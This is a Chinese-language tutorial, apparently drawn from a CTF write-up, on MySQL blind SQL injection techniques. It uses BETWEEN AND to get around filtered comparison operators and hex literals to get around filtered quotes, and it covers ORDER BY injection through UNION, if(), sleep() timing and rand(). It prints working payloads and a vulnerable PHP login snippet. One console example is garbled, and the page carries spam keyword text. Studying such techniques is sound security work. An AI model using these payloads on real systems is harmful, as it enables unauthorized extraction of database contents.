婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > SQL注入的2個小Trick及示例總結

SQL注入的2個小Trick及示例總結
熱門標簽:ai電話電話機器人 河北便宜電銷機器人軟件 怎么去開發一個電銷機器人 小程序智能電話機器人 簡單的智能語音電銷機器人 怎么申請400熱線電話 泗洪正規電話機器人找哪家 湖南保險智能外呼系統產品介紹 南昌呼叫中心外呼系統哪家好

前言

最近發現了兩個關于sql注入的小trick,分享一下.下面話不多說了,來一起看看詳細的介紹吧

between and 操作符代替比較符

操作符 BETWEEN … AND 會選取介于兩個值之間的數據范圍。這些值可以是數值、文本或者日期。

between and有數據比較功能

exp1 between min and max

如果exp1的結果處于min和max之間,`between and`就返回`1`,反之返回`0`.

示例

mysql> select * from user;
+----+----------+----------------------------------+-------------------+
| id | username | password  | email |
+----+----------+----------------------------------+-------------------+
| 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
| 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
| 3 | admin | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com |
| 4 | add | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
+----+----------+----------------------------------+-------------------+
mysql> select * from user where id between 1 and 2;
+----+----------+----------------------------------+-------------------+
| id | username | password  | email |
+----+----------+----------------------------------+-------------------+
| 1 | a | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com |
| 2 | aa | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com |
+----+----------+----------------------------------+-------------------+

大多數數據庫都支持between and操作,但是對于邊界的處理有所不同,在mysql中,between and 是包含邊界的,在數學中也就是[min,max]

在盲注中應用

between and可以用來在過濾了=,like, regexp,>,的情況下使用.

mysql> select database();
+------------+
| database() |
+------------+
| test |
+------------+
1 row in set (0.00 sec)

1. 配合截取函數使用

mysql> select mid(database(),1,1) between 'a' and 'a' ;
+-----------------------------------------+
| mid(database(),1,1) between 'a' and 'a' |
+-----------------------------------------+
|   0 |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql> select mid(database(),1,1) between 't' and 't' ;
+-----------------------------------------+
| mid(database(),1,1) between 't' and 't' |
+-----------------------------------------+
|   1 |
+-----------------------------------------+
1 row in set (0.00 sec)

2. 截取函數被過濾

表達式

select exp between min and max

在截取字符函數被過濾的時候,設置min和 max的方式有所改變.

測試1

mysql> select 'b' between 'a' and 'c';
+-------------------------+
| 'b' between 'a' and 'c' |
+-------------------------+
|  1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select 'b' between 'a' and 'b';
+-------------------------+
| 'b' between 'a' and 'b' |
+-------------------------+
|  1 |
+-------------------------+
1 row in set (0.00 sec)

mysql> select 'b' between 'b' and 'c';
+-------------------------+
| 'b' between 'b' and 'c' |
+-------------------------+
|  1 |
+-------------------------+
1 row in set (0.00 sec)

測試2

mysql> select 'bcd' between 'a' and 'c';
+---------------------------+
| 'bcd' between 'a' and 'c' |
+---------------------------+
|  1 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select 'bcd' between 'a' and 'b';
+---------------------------+
| 'bcd' between 'a' and 'b' |
+---------------------------+
|  0 |
+---------------------------+
1 row in set (0.00 sec)

mysql> select 'bcd' between 'b' and 'c';
+---------------------------+
| 'bcd' between 'b' and 'c' |
+---------------------------+
|  1 |
+---------------------------+
1 row in set (0.00 sec)

由測試可知,當exp為單個字符時三種區間返回值都是1,但是當exp為字符串時,當區間為a-b時,返回值為0.區間為a-c或者b-c時,返回值為1.

也就是在進行字符串比較時,只會包含一邊的值,也就是[b,c).

所以在實際利用時,就要注意區間的范圍.

實際測試

mysql> select database() between 'a' and 'z';
+--------------------------------+
| database() between 'a' and 'z' |
+--------------------------------+
|  1 |
+--------------------------------+
1 row in set (0.05 sec)
...
mysql> select database() between 't' and 'z';
+--------------------------------+
| database() between 't' and 'z' |
+--------------------------------+
|  1 |
+--------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'u' and 'z';
+--------------------------------+
| database() between 'u' and 'z' |
+--------------------------------+
|  0 |
+--------------------------------+
1 row in set (0.00 sec)

由結果可知,第一個字符為t

第二個字符

mysql> select database() between 'tatest
+----------------------------------+test
| database() between 'ta' and 'tz' |test
+----------------------------------+
|    1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'te' and 'tz';
+----------------------------------+
| database() between 'te' and 'tz' |
+----------------------------------+
|    1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 'tf' and 'tz';
+----------------------------------+
| database() between 'tf' and 'tz' |
+----------------------------------+
|    0 |
+----------------------------------+
1 row in set (0.00 sec)

剩下的以此類推.最終為test.

3. 單引號被過濾

between and還支持16進制,所以可以用16進制,來繞過單引號的過濾.

測試

mysql> select database() between 0x61 and 0x7a; //select database() between 'a' and 'z';
+----------------------------------+
| database() between 0x61 and 0x7a |
+----------------------------------+
|    1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 0x74 and 0x7a; //select database() between 't' and 'z';
+----------------------------------+
| database() between 0x74 and 0x7a |
+----------------------------------+
|    1 |
+----------------------------------+
1 row in set (0.00 sec)

mysql> select database() between 0x75 and 0x7a; //select database() between 'u' and 'z';
+----------------------------------+
| database() between 0x75 and 0x7a |
+----------------------------------+
|    0 |
+----------------------------------+
1 row in set (0.00 sec)

了解order by

order by是mysql中對查詢數據進行排序的方法,
使用示例

select * from 表名 order by 列名(或者數字) asc;升序(默認升序)
select * from 表名 order by 列名(或者數字) desc;降序

這里的重點在于order by后既可以填列名或者是一個數字。舉個例子:

id是user表的第一列的列名,那么如果想根據id來排序,有兩種寫法:

select * from user order by id;
selecr * from user order by 1;

order by盲注

結合union來盲注

這個是在安恒杯月賽上看到的。

后臺關鍵代碼

$sql = 'select * from admin where username='".$username."'';
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if(isset($row)row['username']!="admin"){
 $hit="username error!";
}else{
 if ($row['password'] === $password){
 $hit="";
 }else{
 $hit="password error!";
 }
}

payload

username=admin' union 1,2,'字符串' order by 3

sql語句就變為

select * from admin where username='admin' or 1 union select 1,2,binary '字符串' order by 3;

這里就會對第三列進行比較,即將字符串和密碼進行比較。然后就可以根據頁面返回的不同情況進行盲注。
注意的是最好加上binary,因為order by比較的時候不區分大小寫。

基于if()盲注

需要知道列名

order by的列不同,返回的頁面當然也是不同的,所以就可以根據排序的列不同來盲注。

示例:

order by if(1=1,id,username);

這里如果使用數字代替列名是不行的,因為if語句返回的是字符類型,不是整型。

不需要知道列名

payload

order by if(表達式,1,(select id from information_schema.tables))

如果表達式為false時,sql語句會報ERROR 1242 (21000): Subquery returns more than 1 row的錯誤,導致查詢內容為空,如果表達式為true是,則會返回正常的頁面。

基于時間的盲注

payload

order by if(1=1,1,sleep(1))

測試結果

select * from ha order by if(1=1,1,sleep(1)); #正常時間
select * from ha order by if(1=2,1,sleep(1)); #有延遲

測試的時候發現延遲的時間并不是sleep(1)中的1秒,而是大于1秒。

最后發現延遲的時間和所查詢的數據的條數是成倍數關系的。

計算公式:

延遲時間=sleep(1)的秒數*所查詢數據條數

我所測試的ha表中有五條數據,所以延遲了5秒。如果查詢的數據很多時,延遲的時間就會很長了。

在寫腳本時,可以添加timeout這一參數來避免延遲時間過長這一情況。

基于rang()的盲注

原理不贅述了,直接看測試結果

mysql> select * from ha order by rand(true);
+----+------+
| id | name |
+----+------+
| 9 | NULL |
| 6 | NULL |
| 5 | NULL |
| 1 | dss |
| 0 | dasd |
+----+------+
mysql> select * from ha order by rand(false);
+----+------+
| id | name |
+----+------+
| 1 | dss |
| 6 | NULL |
| 0 | dasd |
| 5 | NULL |
| 9 | NULL |
+----+------+

可以看到當rang()為true和false時,排序結果是不同的,所以就可以使用rang()函數進行盲注了。

order by rand(ascii(mid((select database()),1,1))>96)

后記

order by注入在crf里其實出現挺多了,一直沒有總結過.這次比較全的整理了一下(自認為比較全.XD),就和between and一起發出來了.歡迎師傅交流學習.

好了,以上就是這篇文章的全部內容了,希望本文的內容對大家的學習或者工作具有一定的參考學習價值,如果有疑問大家可以留言交流,謝謝大家對腳本之家的支持。

您可能感興趣的文章:
  • 利用SQL注入漏洞登錄后臺的實現方法
  • php中防止SQL注入的最佳解決方法
  • PHP中防止SQL注入實現代碼
  • php防止SQL注入詳解及防范
  • PHP+MySQL 手工注入語句大全 推薦
  • 整理比較全的Access SQL注入參考
  • 利用SQL注入漏洞拖庫的方法
  • C#防SQL注入代碼的三種方法
  • 防止xss和sql注入:JS特殊字符過濾正則
  • PHP中防止SQL注入攻擊和XSS攻擊的兩個簡單方法

標簽:那曲 柳州 威海 瀘州 淮安 荊門 江蘇 景德鎮

巨人網絡通訊聲明:本文標題《SQL注入的2個小Trick及示例總結》,本文關鍵詞  SQL,注入,的,2個小,Trick,及,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《SQL注入的2個小Trick及示例總結》相關的同類信息!
  • 本頁收集關于SQL注入的2個小Trick及示例總結的相關信息資訊供網民參考!
    • 推薦文章
    主站蜘蛛池模板: 黄龙县| 定州市| 桦南县| 汾阳市| 桦南县| 邢台市| 滦平县| 崇阳县| 高淳县| 蓬溪县| 渭源县| 论坛| 龙井市| 公主岭市| 孟连| 博客| 浠水县| 绥滨县| 明水县| 福清市| 宜兰市| 宜兰市| 叶城县| 保亭| 钦州市| 安多县| 蒙山县| 平昌县| 噶尔县| 广饶县| 吉林省| 石台县| 普兰县| 临安市| 军事| 宁津县| 且末县| 清镇市| 盐亭县| 陇川县| 合水县|